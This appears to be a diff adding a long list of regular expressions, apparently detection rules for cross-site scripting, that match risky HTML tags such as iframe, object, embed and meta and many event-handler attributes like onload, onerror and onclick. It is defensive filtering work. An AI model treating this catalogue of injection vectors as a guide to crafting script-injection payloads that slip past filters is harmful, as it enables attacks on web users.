+<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?m\W*?a\W*?r\W*?q\W*?u\W*?e\W*?e
+<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?l\W*?i\W*?n\W*?k[^>\w]
+<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?o\W*?b\W*?j\W*?e\W*?c\W*?t[^>\w]
+<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?e\W*?m\W*?b\W*?e\W*?d[^>\w]
+<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?a\W*?p\W*?p\W*?l\W*?e\W*?t[^>\w]
+<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?p\W*?a\W*?r\W*?a\W*?m[^>\w]
+<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?i?\W*?f\W*?r\W*?a\W*?m\W*?e[^>\w]
+<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?b\W*?a\W*?s\W*?e[^>\w]
+<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?b\W*?o\W*?d\W*?y[^>\w]
+<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?m\W*?e\W*?t\W*?a[^>\w]
+<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?i\W*?m\W*?a?\W*?g\W*?e?[^>\w]
+<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?v\W*?i\W*?d\W*?e\W*?o[^>\w]
+<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?a\W*?u\W*?d\W*?i\W*?o[^>\w]
+<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?b\W*?i\W*?n\W*?d\W*?i\W*?n\W*?g\W*?s[^>\w]
+<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?s\W*?e\W*?t[^>\w]
+<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?a\W*?n\W*?i\W*?m\W*?a\W*?t\W*?e[^>\w]
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)background[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)formaction[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)lowsrc[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onAppCommand[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onDOMActivate[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onDOMAttrModified[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onDOMCharacterDataModified[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onDOMFocusIn[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onDOMFocusOut[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onDOMMouseScroll[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onDOMNodeInsertedIntoDocument[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onDOMNodeInserted[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onDOMNodeRemovedFromDocument[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onDOMNodeRemoved[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onDOMSubtreeModified[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onLoad[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozAfterPaint[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozAudioAvailable[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozBeforeResize[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozEdgeUICanceled[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozEdgeUICompleted[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozEdgeUIStarted[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozMagnifyGestureStart[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozMagnifyGestureUpdate[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozMagnifyGesture[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozMouseHittest[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozMousePixelScroll[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozPressTapGesture[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozRotateGestureStart[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozRotateGestureUpdate[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozRotateGesture[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozScrolledAreaChanged[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozSwipeGestureEnd[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozSwipeGestureStart[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozSwipeGestureUpdate[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozSwipeGesture[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozTapGesture[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onRequest[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onSVGAbort[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onSVGError[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onSVGLoad[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onSVGResize[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onSVGScroll[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onSVGUnload[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onSVGZoom[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onabort[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onactivate[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onadapteradded[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onaddtrack[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onafterprint[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onafterscriptexecute[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onafterupdate[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onalerting[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onanimationend[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onanimationiteration[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onanimationstart[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onantennastatechange[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onaudioend[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onaudioprocess[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onaudiostart[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbeforeactivate[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbeforedeactivate[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbeforecopy[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbeforecut[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbeforeeditfocus[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbeforepaste[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbeforeprint[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbeforescriptexecute[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbeforeunload[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbeforeupdate[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbeginEvent[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbegin[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onblocked[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onblur[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbounce[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onboundary[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbroadcast[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbusy[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncached[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncallschanged[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncanplay[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncanplaythrough[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncardstatechange[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncellchange[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncfstatechange[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onchange[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onchargingchange[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onchargingtimechange[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onchecking[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onclick[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onclose[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncommand[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncommandupdate[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncomplete[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncompositionend[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncompositionstart[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncompositionupdate[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onconnected[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onconnecting[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncontextmenu[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncontrolselect[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncopy[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncuechange[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncut[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondataavailable[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondatachange[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondataerror[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondatasetchanged[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondatasetcomplete[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondblclick[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondeactivate[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondeliveryerror[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondeliverysuccess[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondevicefound[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondevicelight[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondevicemotion[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondeviceorientation[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondeviceproximity[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondialing[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondisabled[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondischargingtimechange[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondisconnected[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondisconnecting[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondownloading[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondragdrop[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondragend[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondragenter[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondragexit[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondraggesture[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondragleave[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondragover[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondragstart[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondrop[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondurationchange[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onemptied[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onenabled[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onendEvent[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onend[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onended[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onenter[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onerror[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onerrorupdate[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onexit[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onfailed[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onfilterchange[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onfinish[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onfocus[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onfocusin[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onfocusout[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onformchange[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onforminput[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ongamepadaxismove[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ongamepadbuttondown[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ongamepadbuttonup[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ongamepadconnected[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ongamepaddisconnected[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onget[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onhashchange[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onheadphoneschange[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onheld[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onhelp[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onholding[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onicccardlockerror[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oniccinfochange[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onincoming[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oninput[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oninvalid[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onkeydown[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onkeypress[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onkeyup[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onlevelchange[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onloadeddata[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onloadedmetadata[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onloadend[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onloadstart[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onlosecapture[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)only[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmark[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmessage[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmousedown[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmouseenter[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmouseleave[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmousemove[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmouseout[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmouseover[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmouseup[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmousewheel[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmove[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmoveend[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmovestart[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmozfullscreenchange[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmozfullscreenerror[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmoznetworkdownload[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmoznetworkupload[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmozorientationchange[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmozpointerlockchange[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmozpointerlockerror[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmoztimechange[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onnomatch[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onnoupdate[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onobsolete[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onoffline[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ononline[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onopen[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onoverflow[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onoverflowchanged[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onpagehide[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onpageshow[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onpaint[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onpaste[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onpause[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onplay[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onplaying[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onpopstate[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onpopuphidden[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onpopuphiding[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onpopupshowing[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onpopupshown[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onprogress[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onpropertychange[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onratechange[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onreadystatechange[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onreceived[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onremovetrack[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onrepeatEvent[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onrepeat[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onreset[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onresize[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onresult[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onresume[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onresuming[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onretrieving[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onrowenter[\s\x08]*?=
+(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onrowexit[\s\x08]*?=
